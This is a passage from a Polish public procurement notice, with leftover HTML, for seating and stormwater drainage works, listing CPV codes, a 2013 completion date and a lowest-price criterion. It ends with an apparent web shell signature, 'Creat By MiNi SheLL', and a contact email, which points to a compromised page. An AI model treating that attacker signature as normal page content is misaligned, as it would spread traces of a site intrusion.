Miejsca siedzące - typowe przenośne zestawy segmentowe.
Odprowadzenie wód opadowych

Szczegółowo przedmiot zamówienia został opisany w:
Rozdziale III Przedmiar robót, Dokumentacja projektowa,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.11.12.00-0, 45.21.22.21-1, 45.22.38.00-4, 45.23.24.52-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com